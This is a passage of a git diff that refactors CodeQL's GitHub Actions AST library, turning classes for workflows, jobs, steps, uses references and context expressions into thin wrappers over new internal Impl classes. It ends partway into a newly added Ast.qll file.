@@ -1,933 +1,232 @@ -private import codeql.actions.ast.internal.Yaml +private import codeql.actions.ast.internal.Ast private import codeql.Locations -newtype TAstNode = - TWorflowNode(YamlNode n) or - TExpressionNode(StringValue n, string expression, int exprOffset) { - expression = getASimpleReferenceExpression(n, exprOffset) - } - -class AstNode extends TAstNode { - abstract AstNode getAChildNode(); +class AstNode instanceof AstNodeImpl { + AstNode getAChildNode() { result = super.getAChildNode() } - abstract AstNode getParentNode(); + AstNode getParentNode() { result = super.getParentNode() } - abstract string getAPrimaryQlClass(); + string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } - abstract string toString(); + Location getLocation() { result = super.getLocation() } - abstract Location getLocation(); + string toString() { result = super.toString() } - abstract File getFile(); + Job getEnclosingJob() { result = super.getEnclosingJob() } - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } - /** - * Gets a environment variable expression by name in the scope of the current node. 
- */ - ExpressionNode getInScopeEnvVarExpr(string name) { - exists(StringValue l, Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and - l.getAnExpression() = result - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } -class ExpressionNode extends AstNode, TExpressionNode { - StringValue n; - string rawExpression; +class ScalarValue extends AstNode instanceof ScalarValueImpl { } + +class Expression extends AstNode instanceof ExpressionImpl { string expression; - int exprOffset; + string rawExpression; - ExpressionNode() { - this = TExpressionNode(n, rawExpression, exprOffset - 1) and - expression = - rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + Expression() { + expression = this.getExpression() and + rawExpression = this.getRawExpression() } - override string toString() { result = expression } - - override AstNode getAChildNode() { none() } - - override AstNode getParentNode() { result = n } - - override string getAPrimaryQlClass() { result = "ExpressionNode" } - string getExpression() { result = expression } string getRawExpression() { result = rawExpression } - - Job getJob() { result.getAChildNode*() = n } - - /** - * Gets the length of each line in the StringValue . - */ - int lineLength(int idx) { - exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) - } - - /** - * Gets the sum of the length of the lines up to the given index. - */ - int partialLineLengthSum(int i) { - i in [0 .. count(n.getValue().splitAt("\n"))] and - result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) - } - - /** - * Gets the absolute coordinates of the expression. 
- */ - predicate expressionLocation(int sl, int sc, int el, int ec) { - exists(int lineDiff, string style, Location loc | - loc = n.asYamlNode().getLocation() and - lineDiff = loc.getEndLine() - loc.getStartLine() and - style = n.asYamlNode().(YamlString).getStyle() - | - // eg: - // - run: echo "hello" - // - run: 'echo "hello"' - // - run: "echo 'hello'" - style = ["", "\"", "'"] and - lineDiff = 0 and - sl = loc.getStartLine() and - el = sl and - sc = loc.getStartColumn() + exprOffset and - ec = sc + rawExpression.length() - 1 - or - // eg: - // - run: "echo 'hello' - // echo 'hello'" - // - run: "echo 'hello' - // echo 'hello' - // echo 'hello'" - style = ["", "\"", "'"] and - lineDiff > 0 and - sl = loc.getStartLine() and - el = loc.getEndLine() and - sc = loc.getStartColumn() and - ec = loc.getEndColumn() - or - // eg: - // - run: | - // echo "hello" - // - run: | - // echo "hello" - // echo "bye" - style = "|" and - exists(int r | - ( - r > 0 and - this.partialLineLengthSum(r - 1) < exprOffset and - this.partialLineLengthSum(r) >= exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = - n.getKeyNode().getLocation().getStartColumn() + exprOffset - - this.partialLineLengthSum(r - 1) + 2 - 1 and - ec = sc + rawExpression.length() - 1 - or - r = 0 and - this.partialLineLengthSum(r) > exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and - ec = sc + rawExpression.length() - 1 - ) - ) - or - // eg: - // - run: > - // echo "hello" - // - run: > - // echo "hello" - // echo "hello" - style = ">" and - sl = loc.getStartLine() + 1 and - el = loc.getEndLine() and - sc = n.getKeyNode().getLocation().getStartColumn() and - ec = loc.getEndColumn() - ) - } - - override Location getLocation() { - exists(Location loc | - this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), - loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and - result = 
loc - ) - } - - predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { - path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionLocation(sl, sc, el, ec) - } - - override File getFile() { result = n.asYamlNode().getFile() } -} - -/** - * Base class for the AST tree. Based on YamlNode from the Yaml library. - */ -class WorkflowNode extends AstNode, TWorflowNode { - YamlNode n; - - WorkflowNode() { this = TWorflowNode(n) } - - override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - - override AstNode getAChildNode() { - result = TWorflowNode(n.getAChildNode()) - or - exists(ExpressionNode e | e.getParentNode() = this | result = e) - } - - override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } - - override Location getLocation() { result = n.getLocation() } - - override File getFile() { result = n.getFile() } - - YamlNode asYamlNode() { result = n } - - YamlMapping asYamlMapping() { result = n } - - override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends WorkflowNode { } +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } -/** A workflow level `env` mapping. */ -class WorkflowEnv extends Env { - Workflow workflow; + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } - WorkflowEnv() { - n instanceof YamlMapping and - workflow.asYamlMapping().lookup("env") = this.asYamlNode() - } + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } -} - -/** A job level `env` mapping. 
*/ -class JobEnv extends Env { - Job job; - - JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } -} - -/** A step level `env` mapping. */ -class StepEnv extends Env { - Step step; - - StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } } /** * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends WorkflowNode { - //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { - CompositeAction() { - n instanceof YamlDocument and - n instanceof YamlMapping and - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = - "composite" - } - - /** Gets the `runs` mapping. 
*/ - Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + Outputs getOutputs() { result = super.getOutputs() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - Input getAnInput() { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } + Input getAnInput() { result = super.getAnInput() } - Input getInput(string name) { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } /** * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends WorkflowNode { - CompositeAction action; +class Runs extends AstNode instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } - Runs() { - n instanceof YamlMapping and - action.asYamlMapping().lookup("runs") = this.asYamlNode() - } + Step getAStep() { result = super.getAStep() } - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } - - /** Gets the step at the given index within this job. 
*/ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Step getStep(int i) { result = super.getStep(i) } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends WorkflowNode { - Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + string getName() { result = super.getName() } - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } + Job getAJob() { result = super.getAJob() } - /** Gets the name of the workflow. */ - string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } + Job getJob(string jobId) { result = super.getJob(jobId) } - /** Gets the job within this workflow with the given job ID. 
*/ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - /** Gets a job within this workflow */ - Job getAJob() { result = this.getJob(_) } + string getATriggerEvent() { result = super.getATriggerEvent() } - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | - y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) - ) - } - - string getATriggerEvent() { - exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) - } + Permissions getPermissions() { result = super.getPermissions() } - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } + Strategy getStrategy() { result = super.getStrategy() } } -class ReusableWorkflow extends Workflow { - YamlValue workflow_call; - - ReusableWorkflow() { - n instanceof YamlMapping and - this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call - } - - Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - Input getAnInput() { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } + Input getAnInput() { result = super.getAnInput() } - Input getInput(string name) { - 
workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } -class Input extends WorkflowNode { - YamlMapping parent; +class Input extends AstNode instanceof InputImpl { } - Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } -} - -class Outputs extends WorkflowNode { - YamlMapping parent; - - Outputs() { - n instanceof YamlMapping and - parent.lookup("outputs") = this.asYamlNode() - } - - /** - * Gets an output expression. - */ - ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } - - /** - * Gets a specific output expression by name. - */ - ExpressionNode getOutputExpr(string name) { - exists(StringValue l | - l.getAnExpression() = result and - ( - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or - this.asYamlMapping().lookup(name) = l.asYamlNode() - ) - ) - } +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - string getAnOutputName() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + // TODO: REMOVE override string toString() { result = "Job outputs node" } } -class Permissions extends WorkflowNode { - YamlMapping parent; - - Permissions() { - n instanceof YamlMapping and - parent.lookup("permissions") = this.asYamlNode() - } -} - -class Strategy extends WorkflowNode { - YamlMapping parent; +class Permissions extends AstNode instanceof PermissionsImpl { } - Strategy() { - n instanceof YamlMapping and - parent.lookup("strategy") = this.asYamlNode() - } +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } - /** - * Gets a specific matric 
expression (YamlMapping) by name. - */ - StringValue getMatrixVar(string name) { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() - } - - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getAMatrixVar() { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() - } + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends WorkflowNode { - Job job; - - Needs() { - n instanceof YamlMappingLikeNode and - job.asYamlMapping().lookup("needs") = this.asYamlNode() - } - - Job getJob() { result = job } - - Job getANeededJob() { - result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - } +class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } } /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends WorkflowNode { - string jobId; - Workflow workflow; +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } - Job() { - n instanceof YamlMapping and - this.asYamlNode() = workflow.getJobs().lookup(jobId) - } + Workflow getWorkflow() { result = super.getWorkflow() } - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } + Job getANeededJob() { result = super.getANeededJob() } - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } + Outputs getOutputs() { result = super.getOutputs() } - /** Gets the step at the given index within this job. 
*/ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** - * Gets a needed job. - * eg: - * - needs: [job1, job2] - */ - Job getANeededJob() { - exists(Needs needs | - needs.getJob() = this and - result = needs.getANeededJob() - ) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - /** - * Gets the declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - - /** - * Reusable workflow jobs may have Uses children - * eg: - * call-job: - * uses: ./.github/workflows/reusable_workflow.yml - * with: - * arg1: value1 - */ - UsesJob getUses() { result.getJob() = this } - - predicate usesReusableWorkflow() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } + Permissions getPermissions() { result = super.getPermissions() } - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } + Strategy getStrategy() { result = super.getStrategy() } +} - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } +class LocalJob extends Job instanceof LocalJobImpl { + Step getAStep() { result = super.getAStep() } - override string toString() { result = "Job: " + jobId } + Step getStep(int i) { result = super.getStep(i) } } /** * A step 
within an Actions job.
 * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps.
 */
-class Step extends WorkflowNode {
- YamlMapping parent;
+class Step extends AstNode instanceof StepImpl {
+ string getId() { result = super.getId() }
- Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() }
+ Env getEnv() { result = super.getEnv() }
- /** Gets the ID of this step, if any. */
- string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() }
-
- /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */
- Job getJob() { result.asYamlNode() = parent }
-
- /** Gets the value of the `if` field in this step, if any. */
- If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") }
+ If getIf() { result = super.getIf() }
 }
 /**
 * An If node representing a conditional statement.
 */
-class If extends WorkflowNode {
- WorkflowNode parent;
-
- If() {
- (parent instanceof Step or parent instanceof Job) and
- parent.asYamlMapping().lookup("if") = this.asYamlNode()
- }
-
- WorkflowNode getEnclosingNode() { result = parent }
-
- string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() }
-}
-
-/**
- * Abstract class representing a call to a 3rd party action or reusable workflow.
- */
-abstract class Uses extends WorkflowNode {
- abstract string getCallee();
-
- abstract string getVersion();
-
- abstract ExpressionNode getArgumentExpr(string key);
-
- override string toString() { result = "Uses Step" }
+class If extends AstNode instanceof IfImpl {
+ string getCondition() { result = super.getCondition() }
 }
-/**
- * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step.
- * The capture groups are:
- * 1: The owner of the repository where the Action comes from, e.g.
`actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesStep extends Step, Uses { - YamlScalar uses; - - UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - override string getCallee() { - result = - ( - uses.getValue().regexpCapture(usesParser(), 1) + "/" + - uses.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } + string getVersion() { result = super.getVersion() } - override Expression getArgumentExpr(string key) { - exists(StringValue l | - l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and - result = l.getAnExpression() - ) - } - - override string toString() { - if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" - } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. 
- */ -class UsesJob extends Uses { - UsesJob() { - this instanceof Job and - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - Job getJob() { result = this } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 - * local repo: ./.github/workflows/workflow-2.yml - * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 - */ - private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } - - private string pathUsesParser() { result = "\\./(.+)" } - - override string getCallee() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if name.getValue().matches("./%") - then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) - else - result = - name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 3) - ) - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) - else none() - ) - } +class UsesStep extends Step, Uses instanceof UsesStepImpl { } - override ExpressionNode getArgumentExpr(string key) { - exists(StringValue l | - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and - result = l.getAnExpression() - ) - } -} +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } /** * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. 
* See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun.
 */
-class Run extends Step {
- StringValue script;
-
- Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) }
-
- StringValue getScript() { result = script }
-
- override string toString() {
- if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step"
- }
-}
-
-/**
- * A YamlString part of a YamlSequence or YamlMapping values.
- */
-class StringValue extends WorkflowNode {
- YamlNode keyNode;
-
- StringValue() {
- n instanceof YamlString and
- exists(YamlCollection c |
- c = keyNode and
- (
- c instanceof YamlMapping and
- //c.(YamlMapping).maps(_, this.asYamlNode())
- exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i))
- or
- c instanceof YamlSequence and
- c.(YamlSequence).getElementNode(_) = this.asYamlNode()
- )
- )
- }
-
- string getValue() { result = this.asYamlNode().(YamlString).getValue() }
+class Run extends Step instanceof RunImpl {
+ string getScript() { result = super.getScript() }
- YamlNode getKeyNode() { result = keyNode }
-
- ExpressionNode getAnExpression() { result = this.getAChildNode() }
-}
-
-/**
- * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string.
- * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions.
- * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes.
- * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }}
- */
-string getASimpleReferenceExpression(StringValue node, int offset) {
- // We use `regexpFind` to obtain *all* matches of `${{...}}`,
- // not just the last (greedy match) or first (reluctant match).
- result =
- node.getValue()
- .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset)
- .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1)
+ Expression getAnScriptExpr() { result = super.getAnScriptExpr() }
 }
-class Expression extends ExpressionNode { }
+abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl {
+ string getFieldName() { result = super.getFieldName() }
-/**
- * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- */
-class ContextExpression extends Expression {
- ContextExpression() {
- expression
- .regexpMatch([
- stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(),
- matrixCtxRegex()
- ])
- }
-
- abstract string getFieldName();
-
- abstract AstNode getTarget();
-}
-
-private string stepsCtxRegex() {
- result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
+ AstNode getTarget() { result = super.getTarget() }
 }
-private string needsCtxRegex() {
- result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
-}
-
-private string jobsCtxRegex() {
- result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)")
-}
+class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { }
-private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") }
+class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { }
-private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") }
+class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { }
-private string inputsCtxRegex() {
- result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"])
-}
+class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { }
-bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] -} +class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } -/** - * Holds for an expression accesing the `steps` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` - */ -class StepsExpression extends ContextExpression { - string stepId; - string fieldName; - - StepsExpression() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - this.getFile() = result.getFile() and - result.(Step).getId() = stepId - } -} - -/** - * Holds for an expression accesing the `needs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` - */ -class NeedsExpression extends ContextExpression { - Job neededJob; - string neededJobId; - string fieldName; - - NeedsExpression() { - expression.regexpMatch(needsCtxRegex()) and - neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = neededJobId - } - - predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - neededJob.getFile() = this.getFile() and - this.getJob().getANeededJob() = neededJob and - ( - // regular jobs - neededJob.getOutputs() = result - or - // reusable workflow calling jobs - neededJob.getUses() = result - ) - } -} - -/** - * Holds for an expression accesing the `jobs` context. 
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows)
- */
-class JobsExpression extends ContextExpression {
- string jobId;
- string fieldName;
-
- JobsExpression() {
- expression.regexpMatch(jobsCtxRegex()) and
- jobId = expression.regexpCapture(jobsCtxRegex(), 1) and
- fieldName = expression.regexpCapture(jobsCtxRegex(), 2)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(Job job |
- job.getId() = jobId and
- job.getFile() = this.getFile() and
- job.getOutputs() = result
- )
- }
-}
-
-/**
- * Holds for an expression the `inputs` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ inputs.foo }}`
- */
-class InputsExpression extends ContextExpression {
- string fieldName;
-
- InputsExpression() {
- expression.regexpMatch(inputsCtxRegex()) and
- fieldName = expression.regexpCapture(inputsCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- result.getFile() = this.getFile() and
- (
- exists(ReusableWorkflow w | w.getInput(fieldName) = result)
- or
- exists(CompositeAction a | a.getInput(fieldName) = result)
- )
- }
-}
-
-/**
- * Holds for an expression accesing the `env` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ env.foo }}`
- */
-class EnvExpression extends ContextExpression {
- string fieldName;
-
- EnvExpression() {
- expression.regexpMatch(envCtxRegex()) and
- fieldName = expression.regexpCapture(envCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(WorkflowNode s |
- s.getInScopeEnvVarExpr(fieldName) = result and
- s.getAChildNode*() = this
- )
- }
-}
-
-/**
- * Holds for an expression accesing the `matrix` context.
- * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability
- * e.g. `${{ matrix.foo }}`
- */
-class MatrixExpression extends ContextExpression {
- string fieldName;
-
- MatrixExpression() {
- expression.regexpMatch(matrixCtxRegex()) and
- fieldName = expression.regexpCapture(matrixCtxRegex(), 1)
- }
-
- override string getFieldName() { result = fieldName }
-
- override AstNode getTarget() {
- exists(Workflow w |
- w.getStrategy().getMatrixVar(fieldName) = result and
- w.getAChildNode*() = this
- )
- or
- exists(Job j |
- j.getStrategy().getMatrixVar(fieldName) = result and
- j.getAChildNode*() = this
- )
- }
-}
+class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { }
diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll
new file mode 100644
index 000000000000..63b25229a588
--- /dev/null
+++ b/ql/lib/codeql/actions/ast/internal/Ast.qll
@@ -0,0 +1,1001 @@
+private import codeql.actions.ast.internal.Yaml
+private import codeql.Locations
+
+/**
+ * Gets the length of each line in the StringValue .
+ */
+bindingset[text]
+int lineLength(string text, int idx) {
+ exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1)
+}
+
+/**
